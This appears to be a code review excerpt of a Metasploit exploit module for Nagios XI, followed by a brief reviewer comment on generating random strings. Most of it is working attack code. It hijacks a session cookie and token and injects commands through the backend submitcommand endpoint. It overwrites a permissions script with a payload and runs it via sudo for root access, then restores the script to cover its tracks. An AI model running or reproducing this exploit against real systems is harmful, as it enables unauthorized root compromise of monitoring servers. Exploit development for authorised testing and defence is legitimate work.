modules/exploits/linux/http/nagios_xi.rb

```diff
@@ -0,0 +1,363 @@
+      end
+
+      authed_nagiosxi = parse_nagiosxi(res)
+      print_status "STEP 4.2: authed_nagiosxi #{authed_nagiosxi}"
+      return authed_nagiosxi
+    end
+
+    def parse_nsp_str(resp_body)
+      nsp_strs = /var nsp_str = "(.+)";\n/.match(resp_body)
+
+      unless nsp_strs || nsp_strs.length < 2
+          fail_with(Failure::NotFound, 'Could not find nsp_str')
+      end
+
+      return nsp_strs[1]
+    end
+
+    def parse_nagiosxi(res)
+      cookie = res.get_cookies
+      matches = /.*nagiosxi=(.+);/.match(cookie)
+
+      unless matches || matches.length < 2
+        fail_with(Failure::NotFound, 'Could not find nagiosxi cookie')
+      end
+
+      return matches[1]
+    end
+
+    def parse_printf(cmd)
+      file_redir = cmd.index(/>>/)
+      unless file_redir
+        fail_with(Failure::NotFound, 'Could not find file redirection character in printf stager cmd')
+      end
+      return cmd[0 .. (file_redir -1)]
+    end
+
+    def execute_command(cmd, opts = {})
+      cmd = parse_printf(cmd)
+
+      cmd_execution = "$(cp /usr/local/nagiosxi/scripts/reset_config_perms.sh /usr/local/nagiosxi/scripts/reset_config_perms.sh.bak ; #{cmd} > /usr/local/nagiosxi/scripts/reset_config_perms.sh ; sudo /usr/local/nagiosxi/scripts/reset_config_perms.sh) &"
+
+      cmd_cleanup = "$(mv /usr/local/nagiosxi/scripts/reset_config_perms.sh.bak /usr/local/nagiosxi/scripts/reset_config_perms.sh)"
+
+      opts_exec = {
+          'uri'=> '/nagiosxi/backend/index.php',
+          'method' => 'POST',
+          'ctype' => 'application/x-www-form-urlencoded',
+          'cookie' => "nagiosxi=#{@nagiosxi}",
+          'vars_get' => {
+              'cmd'=>'submitcommand',
+              'command'=>'1111',
+              'command_data'=> cmd_execution
+          }
+      }
+
+      opts_cleanup = {
+          'uri'=> '/nagiosxi/backend/index.php',
+          'method' => 'POST',
+          'ctype' => 'application/x-www-form-urlencoded',
+          'cookie' => "nagiosxi=#{@nagiosxi}",
+          'vars_get' => {
+              'cmd'=>'submitcommand',
+              'command'=>'1111',
+              'command_data'=> cmd_cleanup
+          }
+      }
+
+      print_status "STEP 5.1: executing payload"
+      res = send_request_cgi(opts_exec)
+
+      if !res || res.code != 200
+        fail_with(Failure::Unknown, 'STEP 5.1: Command execution failed')
+      end
+
+      print_status "STEP 5.2: removing scripts from disc"
+      res = send_request_cgi(opts_cleanup)
+
+      if !res || res.code != 200
+        fail_with(Failure::Unknown, 'STEP 5.2: Command cleanup failed')
+      end
+    end
+
+  def exploit
+    if check != CheckCode::Appears
+      fail_with(Failure::NotVulnerable, 'STEP 0: Vulnerable version not found! punt!')
+    end
+
+
+    set_db_user('root', 'nagiosxi')
+
+    keys = get_api_keys
+
+    username = [*('a'..'z'),*('A'..'Z')].shuffle[0,16].join.to_s
+    password = [*('a'..'z'),*('A'..'Z')].shuffle[0,16].join.to_s
```

Comment:
Looks like you're generating a random string. You could use something like this:

```ruby
username = rand_text_alpha(5..10)
password = rand_text_alpha(5..10)
```